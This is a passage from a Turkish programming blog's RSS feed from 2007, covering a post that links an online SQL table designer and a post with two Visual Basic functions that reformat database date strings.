bu oluşturduğunuz tabloları XML, MSSQL, MySQL, PostgreSQL, PROPEL, Oracle gibi veritabanı sistem diline çevirebilir, geçici olarak kaydedebilir, tasarımınızın çıktısını alabilirsiniz.<span id="more-64"></span></p><p>Buyrun efendim ;</p><p><a href="http://muzaffer.akyil.net/tools/sql" title="SQL Tasarımcı" target="_blank" class="liinternal">Link</a></p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2007%2F04%2F12%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fkisa-yoldan-sql-tablo-tasarimi.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-64"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=64&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2007/04/12/makale/yazilim/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>SQL den alınan tarih bilgisini düzenleme</title><link>http://muzaffer.akyil.net/2007/03/28/makale/yazilim/visual-basic/function/admin/sql-den-alinan-tarih-bilgisini-duzenleme.aspx</link> <comments>http://muzaffer.akyil.net/2007/03/28/makale/yazilim/visual-basic/function/admin/sql-den-alinan-tarih-bilgisini-duzenleme.aspx#comments</comments> <pubDate>Wed, 28 Mar 2007 12:02:27 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Function]]></category> <category><![CDATA[date]]></category> <category><![CDATA[fonksiyon]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[tarih]]></category> <category><![CDATA[visualbasic]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2007/03/28/makale/visual-basic/admin/sql-den-alinan-tarih-bilgisini-duzenleme.aspx</guid> <description><![CDATA[Bildiğiniz üzere hem MSSQL hem de MySQL den bir tarih alanını çektiğimizde bize TR formatında gelmez.(default server ayarları ile). Bize dönen string 2007-03-28 gibidir. Bunu bizim tarih formatımız olan 28-03-2007 şekline çevirmek için aşağıdaki fonksiyonu kullanabilirsiniz. İlk fonksiyon sadece tarihi, ikinci fonksiyon ise hem tarihi hemde zamanı çevirir. 'Sadece Tarihi Çevirir. Function SqLDate(Tarih As String) [...]]]></description> <content:encoded><![CDATA[<p>Bildiğiniz üzere hem MSSQL hem de MySQL den bir tarih alanını çektiğimizde bize TR formatında gelmez.(default server ayarları ile). Bize dönen string 2007-03-28 gibidir. Bunu bizim tarih formatımız olan 28-03-2007 şekline çevirmek için aşağıdaki fonksiyonu kullanabilirsiniz.<span id="more-59"></span></p><p>İlk fonksiyon sadece tarihi, ikinci fonksiyon ise hem tarihi hemde zamanı çevirir.</p><p><code lang="vb"><br /> 'Sadece Tarihi Çevirir.<br /> Function SqLDate(Tarih As String)<br /> Dim Gun As String<br /> Dim Ay As String<br /> Dim YIL As String<br /> Tarih = left$(Tarih, 10)<br /> Gun = left$(Tarih, 2)<br /> Ay = Mid$(Tarih, 4, 2)<br /> YIL = right$(Tarih, 4)<br /> SqlDate = YIL &amp; "-" &amp; Ay &amp; "-" &amp; Gun<br /> End Function<br /> 'Hem Tarihi Hemde Zamanı Çevirir<br /> Function SqLDateTime(DateTime As String)<br /> Dim Gun As String<br /> Dim Ay As String<br /> Dim YIL As String<br /> Dim ssaaT As String<br /> Dim Saat As String<br /> Dim Dakika As String<br /> Dim Saniye As String<br /> ssaaT = right$(DateTime, 9)<br /> DateTime = left$(DateTime, 10)<br /> Gun = left$(DateTime, 2)<br /> Ay = Mid$(DateTime, 4, 2)<br /> YIL = right$(DateTime, 4)<br /> SqlDateTime = YIL &amp; "-" &amp; Ay &amp; "-" &amp; Gun &amp; ssaaT<br /> End Function<br /> </code></p><p>Kolay Gelsin.</p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2007%2F03%2F28%2Fmakale%2Fyazilim%2Fvisual-basic%2Ffunction%2Fadmin%2Fsql-den-alinan-tarih-bilgisini-duzenleme.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-59"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=59&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2007/03/28/makale/yazilim/visual-basic/function/admin/sql-den-alinan-tarih-bilgisini-duzenleme.aspx/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using memcached
Page Caching using memcached
Database Caching using memcached
Object Caching 722/848 objects using memcached

Served from: muzaffer.akyil.net @ 2012-02-09 09:17:33 -->
